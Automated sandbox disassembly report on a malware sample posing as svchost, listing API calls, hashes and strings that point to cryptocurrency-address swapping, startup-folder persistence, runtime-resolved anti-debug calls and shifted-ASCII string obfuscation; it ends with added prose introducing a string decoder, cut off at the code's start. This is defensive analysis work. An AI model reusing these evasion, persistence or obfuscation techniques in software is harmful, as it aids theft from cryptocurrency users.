                                      • API String ID: 3244773808-0
                                      • Opcode ID: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction ID: 65bc4ce697b09d766b27661658b024bedcce05a3cc3625d10305c865c1bed5cd
                                      • Opcode Fuzzy Hash: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction Fuzzy Hash: 6BD0A732505208FBCF10DFF19C0DAEE77ECEB05301F0441B6A805921A0D678CB14E676
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 430fd5df558a3b1ae033b770011898e4f6cd620c13d66e46a3e24c072b499f86
                                      • Instruction ID: 038ddf458eee282a636a142cc17a3e7075d272d91e47c2f3912a22b1e81b3194
                                      • Opcode Fuzzy Hash: 430fd5df558a3b1ae033b770011898e4f6cd620c13d66e46a3e24c072b499f86
                                      • Instruction Fuzzy Hash: 8DD0123995D2CCABD702CB99D450B5DBFBCDB46640F0802D4EC4853702C12FAA19D6D1
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 36cc5bf2f4ed321c1e374c383c5c7a5857d84be30a0155562b47e2e9e28c446b
                                      • Instruction ID: f0412936d34d56b2da9bc331bbda8acfa1cfcc633831e40a4104ab6d3392b165
                                      • Opcode Fuzzy Hash: 36cc5bf2f4ed321c1e374c383c5c7a5857d84be30a0155562b47e2e9e28c446b
                                      • Instruction Fuzzy Hash: E9D0121585C2CC6AD70287949415B9DFFF89B06644F4842C4E88813742C16B5B19C291

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 355 410689-41069b GetModuleHandleW 356 4106a6-4106ee GetProcAddress * 4 355->356 357 41069d-4106a5 call 4103d6 355->357 359 4106f0-4106f7 356->359 360 410706-410725 356->360 359->360 362 4106f9-410700 359->362 363 41072a-410738 TlsAlloc 360->363 362->360 364 410702-410704 362->364 365 4107ff 363->365 366 41073e-410749 TlsSetValue 363->366 364->360 364->363 368 410801-410803 365->368 366->365 367 41074f-410795 call 411471 EncodePointer * 4 call 412581 366->367 373 410797-4107b4 DecodePointer 367->373 374 4107fa call 4103d6 367->374 373->374 377 4107b6-4107c8 call 412773 373->377 374->365 377->374 380 4107ca-4107dd DecodePointer 377->380 380->374 382 4107df-4107f8 call 410413 GetCurrentThreadId 380->382 382->368
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      APIs
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E175
                                        • Part of subcall function 0040E170: _rand.LIBCMT ref: 0040E17F
                                      • DestroyWindow.USER32(00000000), ref: 00405969
                                      • GetLastError.KERNEL32 ref: 0040599F
                                      • DestroyWindow.USER32(00000000), ref: 004059AD
                                      • WaitForSingleObject.KERNEL32(00000000,00000000,C3108867), ref: 004059D2
                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00405A0F
                                      • TranslateMessage.USER32(?), ref: 00405A1D
                                      • DispatchMessageA.USER32(?), ref: 00405A27
                                      • Sleep.KERNEL32(00000014), ref: 00405A31
                                      • DestroyWindow.USER32(00000000), ref: 00405A71
                                      • ReleaseMutex.KERNEL32(00000000), ref: 00405A8E
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: DestroyMessageWindow$_rand$DispatchErrorLastMutexObjectPeekReleaseSingleSleepTranslateWait
                                      • String ID:
                                      • API String ID: 4179124018-0
                                      • Opcode ID: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction ID: 4f33caf6bca9ddad8697e74e62c9060a71084bf4d8c7d1bdb57def999465fb8c
                                      • Opcode Fuzzy Hash: 95db36bbe4d0b48d7d5dd216a49a5c101fdf29f495020ae77c52d24253815567
                                      • Instruction Fuzzy Hash: 92515BB0A00604DBDB20DFA4DC88BAFBBB4FB54714F14463AE506A62E0D7799905CF29
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                      • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(02402188), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                      • GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction ID: f3a3b2490c05c86b39bee9860363372222596c46706d0865df52a15b71608fee
                                      • Opcode Fuzzy Hash: 1075c5336364abca5659f37d9a9cc68f408a79e6500bfff9146bd29ceb1b4dad
                                      • Instruction Fuzzy Hash: E00186B0D40208BBDF149FE0DC4DBDD7BB89B08349F104076E601B62E1D6785754DB5A
                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                      • GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1712948109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000007.00000002.1712779989.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713119194.000000000041A000.00000002.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713233161.000000000041F000.00000040.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713427026.0000000000422000.00000080.00000001.01000000.0000000C.sdmp
                                       • Associated: 00000007.00000002.1713476740.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressCurrentHandleModuleProcProcess
                                      • String ID: 7=-55V-55$v=y>.;Bq7/8;6*=287x;8,.<<
                                      • API String ID: 4190356694-3301033669
                                      • Opcode ID: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A
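The two GetModuleHandleA/GetProcAddress/GetCurrentProcess records above carry the same pair of unreadable strings ("7=-55V-55" and "v=y>.;Bq7/8;6*=287x;8,.<<"), and the MessageBox record earlier in this listing carries a third ("k;B9=8prHYVXTHk87/20Hn25.Hz.98;="). The decoder below is an added example written for this page; it is not code from the sample, from Joe Sandbox, or from any Babadeda write-up. Its one assumption is a hypothesis derived from the report's own data: the two strings are exactly as long as "ntdll.dll" and "NtQueryInformationProcess", and a single Caesar-style shift of 55 positions over the 95 printable ASCII characters maps every character of both consistently, so the sample most likely resolves that export by name at run time. The shift value, the constant names and the helper functions are the author's, not the sample's; the decoded MessageBox title is simply what the same shift yields and should be read as an analyst's recovery, not a report finding.

```python
"""
Decoder for the shifted-ASCII strings in this function listing.
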